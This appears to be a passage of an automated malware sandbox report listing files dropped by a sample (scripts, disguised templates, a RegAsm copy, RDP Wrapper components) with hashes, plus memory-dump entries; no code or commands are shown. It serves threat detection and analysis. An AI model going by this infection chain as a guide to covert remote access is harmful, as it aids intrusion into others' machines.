7d0cb57ba7d2af6ff75a9c203d1338ce31199d07eeca391e9a82fedcbe068512

SHA512
fc381ec4b2dcdfd10d55d5d317e7a6011da9a859a7e98a84d49391637aa22eaf983875c9bf5bad8403b006566d4053d8f8946d3cbd52a433eac60c26f73cf659

Download Submit
C:\Users\Admin\AppData\Roaming\ALKmVbB\81.vbs

Filesize
2KB

MD5
193242114c1738d0ea04aa93659fdd5a

SHA1
a929cc1cfbe44ba8a99117dfd7819776ab45d465

SHA256
c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928

SHA512
46825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4

Download Submit
C:\Users\Admin\AppData\Roaming\ALKmVbB\FuaxiqhamB.bat

Filesize
1KB

MD5
6d19b2702b77a20b89818484cbc83506

SHA1
f42dbd3ab3c60ea9952e2a0f66826e153f89d943

SHA256
042ef6e3349edef436e425a5ec5d7c23f49a93f2866ae31c10ada08e9e012d5f

SHA512
184e47c8aaa2e8a391e08ba2c5932c6a16b620303c4c985df9e149770a866e8e3948a027150070044cdb56adfb11ad8b8cbd5979e78a0fbf444868cab9b4a285

Download Submit
C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll

Filesize
1KB

MD5
705e82f324c49aae504bd529ec0f3330

SHA1
8fb0f70c93a7edb66de83142ed7abfafbc60bf81

SHA256
31be73b1a36ba59416178bca73530ae0f9f1d7925d3f99ccba453c8dde1c21c9

SHA512
ba45515a03c626ace1c67503e0d0990cd740767d857ecd9c8e0c7d651c84e4371549b00094bdf54168fbe4e47578fe3d7aa618be457fee1b8109b6dee2309c2a

Download Submit
C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll

Filesize
942B

MD5
4c5d0b302107e9ab3bf5d8c8144df394

SHA1
e9f2208cf3b2385e49cccd0f766bb249c1f2e5bb

SHA256
e2e7bd0d6c4fb8e0003570753f971e7d9676bf5edd409285ca612f2c9ab68730

SHA512
e695c44ada405fbdf122bfc73cedfb1589fa63c82f6ffcde55bffad67200d27d5a8739469986bafa5857fc53154510140bac3642c83421965754015996db12a4

Download Submit
C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll

Filesize
837B

MD5
e183f207373558455ab227584a4380a8

SHA1
cd6289ccde5ba4af4accd1f7f2e2837fa34a75cb

SHA256
be4a8c5c39c701c74e37e5f2f5669867e888d4fa8027986624142c12a9748a83

SHA512
8837a3ba2634c5f658d3a319581b596681d6b214f2a81ce87f06bf524ed379ebaf79e0242b5bb37b117cf207f75efe47376851d8ddfd0e23aafad8f5f575ac90

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
3f66ec9fc93b0ad2a98da513dc00fddb

SHA1
40a3e322b16fca6a17d76445f3295bd70b926daa

SHA256
ad4c230a69993f4bcb8ac00f43087b74ce87010b52ff74db6ed4707cd266d73b

SHA512
bff5fff78a3f557752c87fd888f611e4b80755d00ebb46f4b9cd9a491ffc2377d250e493e28c3a613af9ca75b341d3dd368e22a4801701ee2988a30498ef66ca

Download Submit
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Abbassando.xltx

Filesize
1.0MB

MD5
e8b84f9aae8f56157bab0cb0ca34fe45

SHA1
08f3fae0a026c59d42d698eeceb2cde4cb5cc83e

SHA256
276c2faaae669568b7655862d1aa85c7b711df06a4bea1cce5f6f5578d9d440e

SHA512
03d80a1a53daa470f6a684f84609b3f744e524300fb6f7e693f0d102bd77ac1d140da200cb4b3df86e0477826bbd7eaba10a8e10d68b6ce378b55384cb18430a

Download Submit
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Attesa.xltx

Filesize
1.1MB

MD5
1cbc6a4ec6699390f807eaca769b9e9e

SHA1
265b0640a35ce9a161ec4c0cad5142d5cf7e9feb

SHA256
747cfe4985ce5203e973f9be6ac7e43c6980babcb7203f1c989469670feec350

SHA512
19fcba9aa6fa052c7ef032f694313b153835a78bbc7072b54f41f3ef9c8985a70b67c7de968312793c2a644d55411f0a058aab955945322069191b746ca44b47

Download Submit
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Esistenza.xltx

Filesize
1.0MB

MD5
6c1b9b74d09b572db467629a0e4d3eec

SHA1
a38508ddc0d932690f416532ddbd32ee4375b164

SHA256
70b96681d633c392bd6b2782128ee018bbe2eedb1ab565784db6016f1401f609

SHA512
3515105e577255827e26b28bbcd79219bf5598809d526481b34dcb645bb54827d7680b2ee9cb82036cfefbc636211b66f73efc63a9a99e09cbb45ffbf5230b5c

Download Submit
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Facilita.xltx

Filesize
1.9MB

MD5
f07ba54d61e8ecd234cfc29dbd63c082

SHA1
2959ab5302060059db4c12af0ff9aa5c8d060499

SHA256
17b8e05da75af68ae79999fb70d3031cbfc92ffaa6862e8b6bb6f9cee11a100a

SHA512
b4ab41d0c0d26b79418a96a926217540e6c784fa87f6625416c39280245773ddf3c84c671fc5e1a9a79a628b12b79c09f34e4ca50fdded172b1add790c3f5864

Download Submit
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Mio.xltx

Filesize
921KB

MD5
a2a838e2b4d650fc8f8f59408183684a

SHA1
90c5b4ed3cb75b7ce6d3fb201d53bcb83fc812a1

SHA256
ad7dc09b1a02ac60bc7fca76a294dfa5499af0ba7a840ff845c042cbac875e57

SHA512
226dd3f5697759bed3926483966b0e71287526dd2308a460239e6cc215dce20a4bb06505969c30efbea5000c135bc2c3eb5b6b1bdb6a17b6cb748e9783336027

Download Submit
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Rimasta.xltx

Filesize
138KB

MD5
6dfb1c72ba137b2aa256907636a86427

SHA1
df8349a7e235ab63920ede1ba662628e2ec3b9e1

SHA256
bd439ef1861dbad75461d95f2ced0e3a6ae9fd776b51fab9f5717444fd89d3ab

SHA512
7298f2db3485a48de49645e7deeb1f413e16d3f4f01c96ddc1599be65465d66918c36b7f95db167b67bc03b2b60564dc9437da6aa798ac2a9842d88bfe4b01db

Download Submit
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Solitario.xltx

Filesize
389KB

MD5
d3394e00792e6cddadf23ad7e89629f6

SHA1
e36e73c357ff01cb184fa477c0f2957a21bbac00

SHA256
71d98c2ccab23a0bf3701d9e3758d40b152309f96d97d83388663f2985a67e04

SHA512
ebd7107dddfa14eb73d3f36e124dd253ad4a7fe11a2b425205ad08a236061e614536622924a5b28bdf5212c10202d0b8b6f4d0040e9a6fba3391d0a1f244707b

Download Submit
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Viso.xltx

Filesize
88KB

MD5
8fb8bc2a52e6514fcd7c481e3d2c5a19

SHA1
b214c89d3960f7c67fe76a55839e6da7342c6b20

SHA256
f7dc64367911ef5e81f3bfb586bb0ffa24e2d2fb19f845b2c1fba6c84ca6006e

SHA512
4cc02e9a48decb29c927bc2bcc800576370db96573757e1164e6133641641d5edd10f7be01cf7cf7ee6840cfe445e9ab6debfdea60b623950abb2f8a1373fb37

Download Submit
C:\Windows\System32\catroot2\edb.log

Filesize
64KB

MD5
fed49d376f98afa1119bcafada188074

SHA1
fbe3f32e2024fa898d87afabb913695e1dd32457

SHA256
a060a2667517ffa704a09dbc5c3a6ec34e4aff97063b93f168b72997c952c38e

SHA512
46823890508d65ec19face21e796d80954a36d739d067685239ebb095fd0ddee946e96784cf2a266bf28448cd329f3e754876b899980230c6762f130e7b26b4d

Download Submit
\Program Files\RDP Wrapper\RDPWInst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
\Program Files\RDP Wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com

Filesize
921KB

MD5
78ba0653a340bac5ff152b21a83626cc

SHA1
b12da9cb5d024555405040e65ad89d16ae749502

SHA256
05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7

SHA512
efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

Download Submit
\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe

Filesize
63KB

MD5
b58b926c3574d28d5b7fdd2ca3ec30d5

SHA1
d260c4ffd603a9cfc057fcb83d678b1cecdf86f9

SHA256
6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3

SHA512
b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

Download Submit
memory/604-374-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/604-375-0x0000000002870000-0x0000000002878000-memory.dmp

Filesize
32KB

Download
memory/1280-225-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/1600-341-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/1752-220-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/1920-73-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/1920-74-0x0000000000080000-0x00000000000E6000-memory.dmp

Filesize
408KB

Download
memory/1920-77-0x0000000000080000-0x00000000000E6000-memory.dmp

Filesize
408KB

Download
memory/1920-65-0x0000000000080000-0x00000000000E6000-memory.dmp

Filesize
408KB

Download
memory/2144-67-0x00000000000D0000-0x00000000000EC000-memory.dmp

Filesize
112KB

Download
memory/2144-64-0x00000000000D0000-0x00000000000EC000-memory.dmp

Filesize
112KB

Download
memory/2144-70-0x00000000000D0000-0x00000000000EC000-memory.dmp

Filesize
112KB

Download
memory/2144-71-0x00000000000D0000-0x00000000000EC000-memory.dmp

Filesize
112KB

Download
memory/2144-66-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2588-78-0x0000000000450000-0x000000000063C000-memory.dmp

Filesize
1.9MB

Download
memory/2588-86-0x0000000000450000-0x000000000063C000-memory.dmp

Filesize
1.9MB

Download
memory/2588-83-0x0000000000450000-0x000000000063C000-memory.dmp

Filesize
1.9MB

Download
memory/2588-80-0x0000000000450000-0x000000000063C000-memory.dmp

Filesize
1.9MB

Download
memory/2588-79-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2712-289-0x00000000017C0000-0x00000000017D0000-memory.dmp

Filesize
64KB

Download
memory/2712-318-0x0000000000EA0000-0x0000000000EA1000-memory.dmp

Filesize
4KB

Download
memory/2712-321-0x0000000000E20000-0x0000000000E21000-memory.dmp

Filesize
4KB

Download
memory/2712-323-0x0000000001180000-0x0000000001181000-memory.dmp

Filesize
4KB

Download
memory/2712-332-0x0000000000DF0000-0x0000000000DF1000-memory.dmp

Filesize
4KB

Download
memory/2712-336-0x00000000015E0000-0x00000000015E1000-memory.dmp

Filesize
4KB

Download
memory/2712-311-0x0000000001240000-0x0000000001241000-memory.dmp

Filesize
4KB

Download
memory/2712-304-0x0000000000E40000-0x0000000000E41000-memory.dmp

Filesize
4KB

Download
memory/2712-302-0x0000000000E30000-0x0000000000E31000-memory.dmp

Filesize
4KB

Download
memory/2712-283-0x00000000012E0000-0x00000000012F0000-memory.dmp

Filesize
64KB

Download
memory/2920-368-0x000000001B760000-0x000000001BA42000-memory.dmp

Filesize
2.9MB

Download
memory/2920-369-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/3040-162-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download